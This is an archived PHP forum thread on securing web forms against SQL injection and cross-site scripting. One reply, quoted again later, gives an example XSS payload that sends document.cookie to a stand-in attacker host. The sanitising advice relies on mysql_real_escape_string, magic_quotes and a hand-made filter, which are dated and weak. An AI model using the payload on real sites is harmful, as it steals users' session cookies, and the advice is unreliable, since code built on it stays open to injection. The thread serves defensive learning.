Jump to content

Archived

This topic is now archived and is closed to further replies.

Mutley

Security PHP & Forms

Recommended Posts

Is there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections, how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.

Share this post


Link to post
Share on other sites
mysql_real_escape_string would prevent SQL injection. Another thing you need to be vary about is XSS (cross-site scripting) attacks.

Share this post


Link to post
Share on other sites
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?

Share this post


Link to post
Share on other sites
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use strip_slashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

function sql_quote($value)
{

if(get_magic_quotes_gpc())
   $value = stripslashes($value);

if(function_exists("mysql_real_escape_string"))
   $value = mysql_real_escape_string($value);
else
   $value = addslashes($value);

return $value;
}

?>[/code]

Orio.

Share this post


Link to post
Share on other sites
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting

Share this post


Link to post
Share on other sites
Is that also prevented with the command spoken above?
If the website does not use cookies then it is inpossible to gether information from the user that goes toward the site, right?

Isn't the stripslashes enough?
Sorry if I got it wrong,

Share this post


Link to post
Share on other sites
[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this: [code]$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention

Share this post


Link to post
Share on other sites
[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, It's beginning to get quite common, it works like this:
1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back the original page.

Here are some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice Daniel0..

Here is a atricle from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]sql insertion[/url].

Good luck,
Tom

Share this post


Link to post
Share on other sites

×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.